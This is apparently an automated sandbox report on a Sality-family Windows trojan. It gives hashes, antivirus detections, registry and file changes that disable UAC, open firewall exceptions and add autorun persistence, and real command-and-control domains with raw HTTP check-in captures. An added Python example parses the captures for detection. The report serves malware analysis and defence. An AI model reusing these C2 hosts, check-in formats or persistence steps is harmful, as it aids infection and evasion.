Analysis Date: 2014-04-30 00:33:43
MD5: c0604710fc2a026149a2f42b8ec8334e
SHA1: ff6428dfc70af8db22a9e220f980e1102c88d155

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text ➝ md5: d681da53549fbe2dc3ac40c634d128ce sha1: 752dc62aad6710809884637abe0f85b1c88c5dc7 size: 173056
Section .rdata ➝ md5: e977908417aacae1d04d6617ed2fe13e sha1: 8e9d5635c1a95acfc31dac7a17fa3d3691e0ac41 size: 52736
Section .data ➝ md5: 65f01e884d3b6e859b26769f9e7c7590 sha1: f14e8216aeea33746fec0ecbe3323a0440fddb72 size: 25600
Section .reloc ➝ md5: c3e61e99dd0ff2dbb46c5ad805b89057 sha1: 10e737f326c5d0a595b0d406730c1bf50e98616b size: 3072
Section .rrdata ➝ md5: b8f51fb12624162ebe296804d5d4d12c sha1: 46c0ca587bbd681c9f981afe8c80f68fcc3e84fb size: 81920
Timestamp: 2013-03-31 15:14:51
Pdb path: @
PEhash: 243d2ef0a15a6c94ead7205bf7a0e60a9e2542cc
IMPhash: 09ace0653e9a1681c71aa59f915845b3
AV: F-Secure Anti-Virus 2013 ➝ Win32.Sality.OG
AV: AVG AntiVirus ➝ Win32/Tanatos.M
AV: Emsisoft Command Line Scanner ➝ Win32.Sality.OG
AV: Ad-Aware Command-Line ➝ Win32.Sality.OG
AV: 360 Safe ➝ Win32.Sality.OG
AV: Avira Anti-Virus Command Line Scanner ➝ W32/Sality.Y
AV: Microsoft Security Essentials 32bit ➝ Virus:Win32/Sality.AM
AV: Quick Heal AntiVirus ➝ W32.Sality.R
AV: Trend Micro System Cleaner (SysClean) ➝ PE_SALITY.EN
AV: Ikarus Command-Line Scanner ➝ Trojan-Spy.Win32.Agent.EO
AV: F-PROT Antivirus for Windows ➝ W32/Sality.AK
AV: ArcaVir 2013 Antivirus ➝ W32.Sality.Aa
AV: Rising Command-Line Scanner ➝ Win32.KUKU.ky
AV: eScan Anti-Virus ➝ Win32.Sality.OG
AV: McAfee Command-Line Scanner ➝ W32/Sality.gen.z
AV: Sunbelt Vipre Antivirus version 3.0 ➝ Trojan.Win32.Gamarue.lvlv (v)
AV: ESET NOD32 Antivirus ➝ Win32/Sality.NAR virus
AV: CA (Total Defense) Internet Security Suite ➝ Win32/Sality.AA
AV: VirusBlokAda (Console scanner) ➝ Virus.Win32.Sality.kaka
AV: Symantec Command-Line Scanner ➝ W32.Sality.AE
AV: Fortinet Command-Line Scanner ➝ W32/Sality.AA
AV: Avast! Professional Anti-Virus 8.0 ➝ No Virus
AV: Norman AntiVirus ➝ win32/Sality.BBYL
AV: Sophos Command-Line Scanner ➝ W32/Sality-AM
AV: Dr. Web Anti-Virus for Windows ➝ Win32.Sector.5
AV: Kaspersky Anti-Virus ➝ Virus.Win32.Sality.gen
AV: Command Anti-Malware ➝ W32/Sality.AK
AV: MalwareBytes Anti-Malware PRO ➝ No Virus
AV: ClamWin Antivirus (Clam AV Engine) ➝ W32.Sality-56

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Registry: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\policies\system\EnableLUA ➝ NULL
Registry: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden ➝ 2
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝ 1
Registry: HKEY_CURRENT_USER\Software\Administrator914\-993627007\1768776769 ➝ 26
Registry: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\C:\malware.exe ➝ C:\malware.exe:*:Enabled:ipsec
Registry: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\00E35EEE ➝ NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\GlobalUserOffline ➝ NULL
Registry: HKEY_CURRENT_USER\Software\Administrator914\A1_0 ➝ 3432392762
Registry: HKEY_CURRENT_USER\SOFTWARE\ImageBase ➝ NULL
Creates File: C:\autorun.inf
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\_install_\msiexec.exe
Creates File: C:\TEMP\FILES\monitor.exe
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\01.tmp
Creates File: C:\11ab7
Creates File: C:\WINDOWS\SYSTEM.INI
Creates File: C:\uoleqe.pif
Creates File: PIPE\SfcApi
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Reader\AcroRd32.exe
Creates File: PIPE\wkssvc
Creates File: C:\TEMP\FILES\AcroRd32.exe
Creates File: C:\122c5
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\xmefe.exe
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temp\01.tmp
Deletes File: C:\122c5
Deletes File: C:\11ab7
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temp\xmefe.exe
Creates Process: "C:\Documents and Settings\Administrator\Local Settings\Temp\_install_\msiexec.exe"
Creates Mutex: services.exeM_616_
Creates Mutex: smss.exeM_492_
Creates Mutex: svchost.exeM_848_
Creates Mutex: svchost.exeM_804_
Creates Mutex: lsass.exeM_628_
Creates Mutex: Op1mutx9
Creates Mutex: userinit.exeM_236_
Creates Mutex: monitor.exeM_1128_
Creates Mutex: svchost.exeM_1016_
Creates Mutex: explorer.exeM_324_
Creates Mutex: csrss.exeM_548_
Creates Mutex: alg.exeM_1868_
Creates Mutex: malware.exeM_1280_
Creates Mutex: winlogon.exeM_572_
Creates Mutex: svchost.exeM_1108_
Creates Mutex: reader_sl.exeM_960_
Creates Mutex: spoolsv.exeM_1336_
Creates Mutex: svchost.exeM_1136_
Creates Mutex: svchost.exeM_1204_

Process
↳ C:\WINDOWS\system32\userinit.exe

Creates Mutex: userinit.exeM_236_
Creates Mutex: Op1mutx9

Process
↳ C:\WINDOWS\Explorer.EXE

Registry: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\C:\WINDOWS\Explorer.EXE ➝ C:\WINDOWS\Explorer.EXE:*:Enabled:ipsec
Registry: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\policies\system\EnableLUA ➝ NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\GlobalUserOffline ➝ NULL
Registry: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden ➝ 2
Creates File: C:\TEMP\FILES\monitor.exe
Creates File: C:\xahynx.cmd
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\gyiiq.exe
Creates File: C:\TEMP\FILES\NOTEPAD.EXE
Creates File: C:\TEMP\FILES\wuauclt.exe
Creates File: C:\17ccc
Creates File: C:\WINDOWS\system32\drivers\sfkji.sys
Creates File: \Device\Afd\Endpoint
Creates File: C:\TEMP\FILES\xmefe.exe
Creates File: C:\170b6
Creates File: C:\174bd
Creates File: C:\TEMP\FILES\msfrnr.exe
Creates File: C:\autorun.inf
Creates File: PIPE\srvsvc
Creates File: C:\TEMP\FILES\reader_sl.exe
Creates File: C:\wnbw.pif
Creates File: asc3360pr
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Reader\AcroRd32.exe
Creates File: PIPE\SfcApi
Creates File: C:\TEMP\FILES\AcroRd32.exe
Creates File: C:\TEMP\FILES\msiexec.exe
Deletes File: C:\174bd
Deletes File: C:\170b6
Deletes File: C:\autorun.inf
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temp\gyiiq.exe
Deletes File: C:\17ccc
Deletes File: C:\WINDOWS\system32\drivers\sfkji.sys
Creates Mutex: services.exeM_616_
Creates Mutex: smss.exeM_492_
Creates Mutex: svchost.exeM_848_
Creates Mutex: svchost.exeM_804_
Creates Mutex: lsass.exeM_628_
Creates Mutex: Op1mutx9
Creates Mutex: monitor.exeM_1128_
Creates Mutex: Shell.CMruPidlList
Creates Mutex: wuauclt.exeM_1428_
Creates Mutex: explorer.exeM_324_
Creates Mutex: svchost.exeM_1016_
Creates Mutex: msiexec.exeM_1596_
Creates Mutex: csrss.exeM_548_
Creates Mutex: alg.exeM_1868_
Creates Mutex: winlogon.exeM_572_
Creates Mutex: svchost.exeM_1108_
Creates Mutex: reader_sl.exeM_960_
Creates Mutex: spoolsv.exeM_1336_
Creates Mutex: svchost.exeM_1204_
Creates Mutex: svchost.exeM_1136_
Creates Service: asc3360pr - C:\WINDOWS\system32\drivers\sfkji.sys
Starts Service: IPFILTERDRIVER
Starts Service: asc3360pr

Process
↳ C:\Program Files\Adobe\Acrobat 7.0\Reader\reader_sl.exe

Creates Mutex: reader_sl.exeM_960_
Creates Mutex: Op1mutx9

Process
↳ "C:\Documents and Settings\Administrator\Local Settings\Temp\_install_\msiexec.exe"

Creates Process: C:\WINDOWS\system32\wuauclt.exe
Creates Mutex: msiexec.exeM_1596_
Creates Mutex: Op1mutx9

Process
↳ C:\WINDOWS\system32\svchost.exe

Process
↳ C:\WINDOWS\system32\svchost.exe

Process
↳ C:\WINDOWS\system32\svchost.exe

Process
↳ C:\WINDOWS\system32\svchost.exe

Creates File: WMIDataDevice
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint

Process
↳ C:\WINDOWS\System32\svchost.exe

Registry: HKEY_LOCAL_MACHINE\Software\Microsoft\WBEM\CIMOM\List of event-active namespaces ➝ NULL
Creates File: PIPE\lsarpc
Creates File: C:\WINDOWS\system32\WBEM\Repository\$WinMgmt.CFG
Creates File: \Device\Afd\Endpoint

Process
↳ C:\WINDOWS\system32\spoolsv.exe

Registry: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Print\BeepEnabled ➝ NULL
Registry: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\Print\TypesSupported ➝ 7
Registry: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Print\Printers\SymbolicLinkValue ➝ NULL
Registry: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Print\Printers\DefaultSpoolDirectory ➝ C:\WINDOWS\System32\spool\PRINTERS\\x00
Registry: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Print\Providers\LogonTime ➝ NULL
Creates File: WMIDataDevice

Process
↳ C:\WINDOWS\System32\alg.exe

Process
↳ C:\WINDOWS\system32\svchost.exe

Process
↳ C:\WINDOWS\system32\wuauclt.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ NULL
Registry: HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\Policies\Explorer\Run\36874 ➝ C:\Documents and Settings\All Users\Local Settings\Temp\msfrnr.exe\\x00
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden ➝ NULL
Registry: HKEY_CURRENT_USER\Software\IMAGE_FILE_HEADER ➝ NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝ 1
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: C:\Documents and Settings\All Users\Local Settings\Temp\msfrnr.exe
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: \Device\Afd\AsyncConnectHlp
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temp\03.tmp
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temp\02.tmp
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temp\_INSTA~1\msiexec.exe
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temp\04.tmp
Creates Mutex: wuauclt.exeM_1428_
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: 3227095050
Creates Mutex: TLS
Creates Mutex: Op1mutx9
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNS: img.suckmycocklameavindustry.in
Winsock DNS: pe.suckmycocklameavindustry.in
Winsock DNS: sc.suckmycocklameavindustry.in

Network Details:

DNS: www.update.microsoft.com.nsatc.net (Type: A) ➝ 157.56.96.156
DNS: www.update.microsoft.com.nsatc.net (Type: A) ➝ 207.46.114.62
DNS: pe.suckmycocklameavindustry.in (Type: A) ➝ 50.116.32.177
DNS: sc.suckmycocklameavindustry.in (Type: A) ➝ 50.116.32.177
DNS: xdqzpbcgrvkj.ru (Type: A) ➝ 195.22.26.231
DNS: xdqzpbcgrvkj.ru (Type: A) ➝ 195.22.26.252
DNS: xdqzpbcgrvkj.ru (Type: A) ➝ 195.22.26.253
DNS: xdqzpbcgrvkj.ru (Type: A) ➝ 195.22.26.254
DNS: img.suckmycocklameavindustry.in (Type: A) ➝ 50.116.32.177
DNS: anam0rph.su (Type: A) ➝ 195.22.26.253
DNS: anam0rph.su (Type: A) ➝ 195.22.26.254
DNS: anam0rph.su (Type: A) ➝ 195.22.26.231
DNS: anam0rph.su (Type: A) ➝ 195.22.26.252
DNS: orzdwjtvmein.in (Type: A) ➝ 195.22.26.253
DNS: orzdwjtvmein.in (Type: A) ➝ 195.22.26.254
DNS: orzdwjtvmein.in (Type: A) ➝ 195.22.26.231
DNS: orzdwjtvmein.in (Type: A) ➝ 195.22.26.252
DNS: www.update.microsoft.com (Type: A)
DNS: ygiudewsqhct.in (Type: A)
DNS: bdcrqgonzmwuehky.nl (Type: A)
HTTP GET: http://pe.suckmycocklameavindustry.in/jxsgcplzuiernbxkgtpdzmivrfboeldd
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://sc.suckmycocklameavindustry.in/anjxsgcplzuiernbxkgtpdzmivrfbovv
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST: http://xdqzpbcgrvkj.ru/in.php
  User-Agent: Mozilla/4.0
HTTP GET: http://img.suckmycocklameavindustry.in/thdqmavjfsocylhuqeanjxsgcplzuipp
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST: http://anam0rph.su/in.php
  User-Agent: Mozilla/4.0
HTTP POST: http://orzdwjtvmein.in/in.php
  User-Agent: Mozilla/4.0
Flows TCP: 192.168.1.1:1033 ➝ 157.56.96.156:80
Flows UDP: 192.168.1.1:1034 ➝ 8.8.4.4:53
Flows TCP: 192.168.1.1:1036 ➝ 50.116.32.177:80
Flows TCP: 192.168.1.1:1038 ➝ 50.116.32.177:80
Flows TCP: 192.168.1.1:1039 ➝ 195.22.26.231:80
Flows TCP: 192.168.1.1:1041 ➝ 50.116.32.177:80
Flows UDP: 192.168.1.1:1040 ➝ 8.8.4.4:53
Flows TCP: 192.168.1.1:1042 ➝ 195.22.26.253:80
Flows UDP: 192.168.1.1:1043 ➝ 8.8.4.4:53
Flows TCP: 192.168.1.1:1044 ➝ 195.22.26.253:80
Flows UDP: 192.168.1.1:1045 ➝ 8.8.4.4:53
Flows UDP: 192.168.1.1:1046 ➝ 8.8.4.4:53

Raw Pcap
0x00000000 (00000)   47455420 2f6a7873 6763706c 7a756965   GET /jxsgcplzuie
0x00000010 (00016)   726e6278 6b677470 647a6d69 76726662   rnbxkgtpdzmivrfb
0x00000020 (00032)   6f656c64 64204854 54502f31 2e310d0a   oeldd HTTP/1.1..
0x00000030 (00048)   41636365 70743a20 2a2f2a0d 0a416363   Accept: */*..Acc
0x00000040 (00064)   6570742d 456e636f 64696e67 3a20677a   ept-Encoding: gz
0x00000050 (00080)   69702c20 6465666c 6174650d 0a557365   ip, deflate..Use
0x00000060 (00096)   722d4167 656e743a 204d6f7a 696c6c61   r-Agent: Mozilla
0x00000070 (00112)   2f342e30 2028636f 6d706174 69626c65   /4.0 (compatible
0x00000080 (00128)   3b204d53 49452036 2e303b20 57696e64   ; MSIE 6.0; Wind
0x00000090 (00144)   6f777320 4e542035 2e313b20 5356313b   ows NT 5.1; SV1;
0x000000a0 (00160)   202e4e45 5420434c 5220322e 302e3530    .NET CLR 2.0.50
0x000000b0 (00176)   37323729 0d0a486f 73743a20 70652e73   727)..Host: pe.s
0x000000c0 (00192)   75636b6d 79636f63 6b6c616d 65617669   uckmycocklameavi
0x000000d0 (00208)   6e647573 7472792e 696e0d0a 436f6e6e   ndustry.in..Conn
0x000000e0 (00224)   65637469 6f6e3a20 4b656570 2d416c69   ection: Keep-Ali
0x000000f0 (00240)   76650d0a 0d0a                         ve....

0x00000000 (00000)   47455420 2f616e6a 78736763 706c7a75   GET /anjxsgcplzu
0x00000010 (00016)   6965726e 62786b67 7470647a 6d697672   iernbxkgtpdzmivr
0x00000020 (00032)   66626f76 76204854 54502f31 2e310d0a   fbovv HTTP/1.1..
0x00000030 (00048)   41636365 70743a20 2a2f2a0d 0a416363   Accept: */*..Acc
0x00000040 (00064)   6570742d 456e636f 64696e67 3a20677a   ept-Encoding: gz
0x00000050 (00080)   69702c20 6465666c 6174650d 0a557365   ip, deflate..Use
0x00000060 (00096)   722d4167 656e743a 204d6f7a 696c6c61   r-Agent: Mozilla
0x00000070 (00112)   2f342e30 2028636f 6d706174 69626c65   /4.0 (compatible
0x00000080 (00128)   3b204d53 49452036 2e303b20 57696e64   ; MSIE 6.0; Wind
0x00000090 (00144)   6f777320 4e542035 2e313b20 5356313b   ows NT 5.1; SV1;
0x000000a0 (00160)   202e4e45 5420434c 5220322e 302e3530    .NET CLR 2.0.50
0x000000b0 (00176)   37323729 0d0a486f 73743a20 73632e73   727)..Host: sc.s
0x000000c0 (00192)   75636b6d 79636f63 6b6c616d 65617669   uckmycocklameavi
0x000000d0 (00208)   6e647573 7472792e 696e0d0a 436f6e6e   ndustry.in..Conn
0x000000e0 (00224)   65637469 6f6e3a20 4b656570 2d416c69   ection: Keep-Ali
0x000000f0 (00240)   76650d0a 0d0a                         ve....

0x00000000 (00000)   504f5354 202f696e 2e706870 20485454   POST /in.php HTT
0x00000010 (00016)   502f312e 310d0a48 6f73743a 20786471   P/1.1..Host: xdq
0x00000020 (00032)   7a706263 6772766b 6a2e7275 0d0a5573   zpbcgrvkj.ru..Us
0x00000030 (00048)   65722d41 67656e74 3a204d6f 7a696c6c   er-Agent: Mozill
0x00000040 (00064)   612f342e 300d0a43 6f6e7465 6e742d54   a/4.0..Content-T
0x00000050 (00080)   7970653a 20617070 6c696361 74696f6e   ype: application
0x00000060 (00096)   2f782d77 77772d66 6f726d2d 75726c65   /x-www-form-urle
0x00000070 (00112)   6e636f64 65640d0a 436f6e74 656e742d   ncoded..Content-
0x00000080 (00128)   4c656e67 74683a20 38340d0a 436f6e6e   Length: 84..Conn
0x00000090 (00144)   65637469 6f6e3a20 636c6f73 650d0a0d   ection: close...
0x000000a0 (00160)   0a757071 63684373 38764654 4b464f56   .upqchCs8vFTKFOV
0x000000b0 (00176)   6d6e494b 47497769 4c72486f 33567436   mnIKGIwiLrHo3Vt6
0x000000c0 (00192)   38543379 71766851 75325471 6574516e   8T3yqvhQu2TqetQn
0x000000d0 (00208)   33714979 37513662 70546644 55745949   3qIy7Q6bpTfDUtYI
0x000000e0 (00224)   66745a33 334e4230 424b516b 67396d59   ftZ33NB0BKQkg9mY
0x000000f0 (00240)   3371773d 3d0a                         3qw==.

0x00000000 (00000)   47455420 2f746864 716d6176 6a66736f   GET /thdqmavjfso
0x00000010 (00016)   63796c68 75716561 6e6a7873 6763706c   cylhuqeanjxsgcpl
0x00000020 (00032)   7a756970 70204854 54502f31 2e310d0a   zuipp HTTP/1.1..
0x00000030 (00048)   41636365 70743a20 2a2f2a0d 0a416363   Accept: */*..Acc
0x00000040 (00064)   6570742d 456e636f 64696e67 3a20677a   ept-Encoding: gz
0x00000050 (00080)   69702c20 6465666c 6174650d 0a557365   ip, deflate..Use
0x00000060 (00096)   722d4167 656e743a 204d6f7a 696c6c61   r-Agent: Mozilla
0x00000070 (00112)   2f342e30 2028636f 6d706174 69626c65   /4.0 (compatible
0x00000080 (00128)   3b204d53 49452036 2e303b20 57696e64   ; MSIE 6.0; Wind
0x00000090 (00144)   6f777320 4e542035 2e313b20 5356313b   ows NT 5.1; SV1;
0x000000a0 (00160)   202e4e45 5420434c 5220322e 302e3530    .NET CLR 2.0.50
0x000000b0 (00176)   37323729 0d0a486f 73743a20 696d672e   727)..Host: img.
0x000000c0 (00192)   7375636b 6d79636f 636b6c61 6d656176   suckmycocklameav
0x000000d0 (00208)   696e6475 73747279 2e696e0d 0a436f6e   industry.in..Con
0x000000e0 (00224)   6e656374 696f6e3a 204b6565 702d416c   nection: Keep-Al
0x000000f0 (00240)   6976650d 0a0d0a                       ive....

0x00000000 (00000)   504f5354 202f696e 2e706870 20485454   POST /in.php HTT
0x00000010 (00016)   502f312e 310d0a48 6f73743a 20616e61   P/1.1..Host: ana
0x00000020 (00032)   6d307270 682e7375 0d0a5573 65722d41   m0rph.su..User-A
0x00000030 (00048)   67656e74 3a204d6f 7a696c6c 612f342e   gent: Mozilla/4.
0x00000040 (00064)   300d0a43 6f6e7465 6e742d54 7970653a   0..Content-Type:
0x00000050 (00080)   20617070 6c696361 74696f6e 2f782d77    application/x-w
0x00000060 (00096)   77772d66 6f726d2d 75726c65 6e636f64   ww-form-urlencod
0x00000070 (00112)   65640d0a 436f6e74 656e742d 4c656e67   ed..Content-Leng
0x00000080 (00128)   74683a20 38340d0a 436f6e6e 65637469   th: 84..Connecti
0x00000090 (00144)   6f6e3a20 636c6f73 650d0a0d 0a757071   on: close....upq
0x000000a0 (00160)   63684373 38764654 4b464f56 6d6e494b   chCs8vFTKFOVmnIK
0x000000b0 (00176)   47497769 4c72486f 33567436 38543379   GIwiLrHo3Vt68T3y
0x000000c0 (00192)   71766851 75325471 6574516e 33714979   qvhQu2TqetQn3qIy
0x000000d0 (00208)   37513662 70546644 55745949 66745a33   7Q6bpTfDUtYIftZ3
0x000000e0 (00224)   334e4230 424b516b 67396d59 3371773d   3NB0BKQkg9mY3qw=
0x000000f0 (00240)   3d76650d 0a0d0a                       =ve....

0x00000000 (00000)   504f5354 202f696e 2e706870 20485454   POST /in.php HTT
0x00000010 (00016)   502f312e 310d0a48 6f73743a 206f727a   P/1.1..Host: orz
0x00000020 (00032)   64776a74 766d6569 6e2e696e 0d0a5573   dwjtvmein.in..Us
0x00000030 (00048)   65722d41 67656e74 3a204d6f 7a696c6c   er-Agent: Mozill
0x00000040 (00064)   612f342e 300d0a43 6f6e7465 6e742d54   a/4.0..Content-T
0x00000050 (00080)   7970653a 20617070 6c696361 74696f6e   ype: application
0x00000060 (00096)   2f782d77 77772d66 6f726d2d 75726c65   /x-www-form-urle
0x00000070 (00112)   6e636f64 65640d0a 436f6e74 656e742d   ncoded..Content-
0x00000080 (00128)   4c656e67 74683a20 38340d0a 436f6e6e   Length: 84..Conn
0x00000090 (00144)   65637469 6f6e3a20 636c6f73 650d0a0d   ection: close...
0x000000a0 (00160)   0a757071 63684373 38764654 4b464f56   .upqchCs8vFTKFOV
0x000000b0 (00176)   6d6e494b 47497769 4c72486f 33567436   mnIKGIwiLrHo3Vt6
0x000000c0 (00192)   38543379 71766851 75325471 6574516e   8T3yqvhQu2TqetQn
0x000000d0 (00208)   33714979 37513662 70546644 55745949   3qIy7Q6bpTfDUtYI
0x000000e0 (00224)   66745a33 334e4230 424b516b 67396d59   ftZ33NB0BKQkg9mY
0x000000f0 (00240)   3371773d 3d0d0a                       3qw==..
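The three POST check-ins in the raw pcap share one shape: POST /in.php, a bare "Mozilla/4.0" User-Agent, a form-urlencoded Content-Type, Content-Length 84, and a body that is a single base64 blob rather than key=value fields. In the anam0rph.su dump the bytes after the 84-byte body ("ve\r\n\r\n") are left over from the preceding Keep-Alive request in the capture buffer, so anything parsing these dumps has to honour Content-Length rather than take everything up to the end. The Python below is an added example written for this page, not part of the sandbox report or of the sample: it parses the report's own hex-dump format, rebuilds the HTTP request, takes only Content-Length bytes as the body, and applies a detection heuristic derived from the three requests shown. The BENIGN request is constructed for contrast, and all function names are this example's own.

```python
import base64
import re

# Hex dump copied from the "Raw Pcap" section of this report (POST to anam0rph.su).
# The trailing "ve\r\n\r\n" after the 84-byte body is capture-buffer residue.
DUMP = """\
0x00000000 (00000)   504f5354 202f696e 2e706870 20485454   POST /in.php HTT
0x00000010 (00016)   502f312e 310d0a48 6f73743a 20616e61   P/1.1..Host: ana
0x00000020 (00032)   6d307270 682e7375 0d0a5573 65722d41   m0rph.su..User-A
0x00000030 (00048)   67656e74 3a204d6f 7a696c6c 612f342e   gent: Mozilla/4.
0x00000040 (00064)   300d0a43 6f6e7465 6e742d54 7970653a   0..Content-Type:
0x00000050 (00080)   20617070 6c696361 74696f6e 2f782d77    application/x-w
0x00000060 (00096)   77772d66 6f726d2d 75726c65 6e636f64   ww-form-urlencod
0x00000070 (00112)   65640d0a 436f6e74 656e742d 4c656e67   ed..Content-Leng
0x00000080 (00128)   74683a20 38340d0a 436f6e6e 65637469   th: 84..Connecti
0x00000090 (00144)   6f6e3a20 636c6f73 650d0a0d 0a757071   on: close....upq
0x000000a0 (00160)   63684373 38764654 4b464f56 6d6e494b   chCs8vFTKFOVmnIK
0x000000b0 (00176)   47497769 4c72486f 33567436 38543379   GIwiLrHo3Vt68T3y
0x000000c0 (00192)   71766851 75325471 6574516e 33714979   qvhQu2TqetQn3qIy
0x000000d0 (00208)   37513662 70546644 55745949 66745a33   7Q6bpTfDUtYIftZ3
0x000000e0 (00224)   334e4230 424b516b 67396d59 3371773d   3NB0BKQkg9mY3qw=
0x000000f0 (00240)   3d76650d 0a0d0a                       =ve....
"""

# Constructed benign request: same path and header shape, but a real form body.
BENIGN = (b"POST /in.php HTTP/1.1\r\nHost: example.invalid\r\nUser-Agent: Mozilla/4.0\r\n"
          b"Content-Type: application/x-www-form-urlencoded\r\nContent-Length: 13\r\n\r\n"
          b"user=a&pass=b")

# "0xOFFSET (decimal)   hex groups   ascii"; hex groups are single-space separated,
# the ASCII column is separated by at least three spaces, so the match stops there.
HEX_LINE = re.compile(r"^0x([0-9a-fA-F]{8}) \(\d+\)\s+((?:[0-9a-fA-F]{2,8} )*[0-9a-fA-F]{2,8})")
B64_BODY = re.compile(rb"^[A-Za-z0-9+/]+={0,2}$")


def parse_hexdump(dump: str) -> bytes:
    """Rebuild raw bytes from the dump, requiring contiguous offsets so a
    dropped or reordered line is detected instead of silently corrupting data."""
    out = bytearray()
    for line in dump.splitlines():
        m = HEX_LINE.match(line)
        if not m:
            continue
        if int(m.group(1), 16) != len(out):
            raise ValueError(f"gap in dump before offset 0x{m.group(1)}")
        out += bytes.fromhex(m.group(2).replace(" ", ""))
    return bytes(out)


def parse_http_request(raw: bytes) -> dict:
    """Split one HTTP/1.1 request into method, target, headers and body.
    Only Content-Length bytes count as body; the rest is returned as 'trailing'."""
    head, sep, rest = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("header block not terminated")
    request_line, *header_lines = head.split(b"\r\n")
    method, target, _version = request_line.split(b" ", 2)
    headers = {}
    for h in header_lines:
        name, _, value = h.partition(b":")
        headers[name.strip().lower().decode()] = value.strip().decode()
    length = int(headers.get("content-length", "0"))
    return {"method": method.decode(), "target": target.decode(),
            "headers": headers, "body": rest[:length], "trailing": rest[length:]}


def is_sality_checkin(req: dict) -> bool:
    """Heuristic from the three POSTs in this report: /in.php, bare Mozilla/4.0 UA,
    form-urlencoded Content-Type, body is one base64 blob with no key=value fields."""
    h, body = req["headers"], req["body"]
    return (req["method"] == "POST"
            and req["target"] == "/in.php"
            and h.get("user-agent") == "Mozilla/4.0"
            and h.get("content-type", "").startswith("application/x-www-form-urlencoded")
            and b"=" not in body.rstrip(b"=")      # '=' only as base64 padding
            and B64_BODY.match(body) is not None
            and len(body) % 4 == 0)


def decode_payload(req: dict) -> bytes:
    """Base64-decode the check-in body; the decoded content is not interpreted here."""
    return base64.b64decode(req["body"], validate=True)


if __name__ == "__main__":
    req = parse_http_request(parse_hexdump(DUMP))
    print(req["headers"]["host"], len(req["body"]), "trailing:", req["trailing"])
    print("sality-shaped:", is_sality_checkin(req), "decoded bytes:", len(decode_payload(req)))
    print("benign form post flagged:", is_sality_checkin(parse_http_request(BENIGN)))
```

The heuristic is purely shape-based and keyed to what this capture shows; it says nothing about the 61 decoded bytes, which would need the sample's own key material to read. The same parser runs unchanged over the two other POST dumps, whose bodies end in "\n" and "\r\n" respectively, and the Content-Length cut is what keeps those terminators out of the base64 input.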


Strings
.U
.....
$
$.
M
.j
.
.U
-
.
 
~
m
.
.
.,.
.
.?.
.
r.
A@ s
dfe 
e.rp
         (((((                  H
jV.s
@l/@
 -PS
Rar 
s de
tDiG
ussm
$$"0$$$
0 0&0*00040:0>0D0H0N0R0X0\0b0f0l0p0v0z0
050<0@0D0H0L0P0T0X0
0b0h0l0p0t0
0Z0`0l0
1$1*10161<1B1H1N1T1Z1`1f1
1%1@1G1L1P1T1q1
1:2@2D2H2L2
=&=1=6=@=E=z=
1	o~h3
2(232E2P2W2\2o2
2^2d2k2t2{2
23ug$$
2cr@Lrad
:":*:2:::D:M:U:l:u:
:!:':,:2:;:D:M:X:c:i:}:
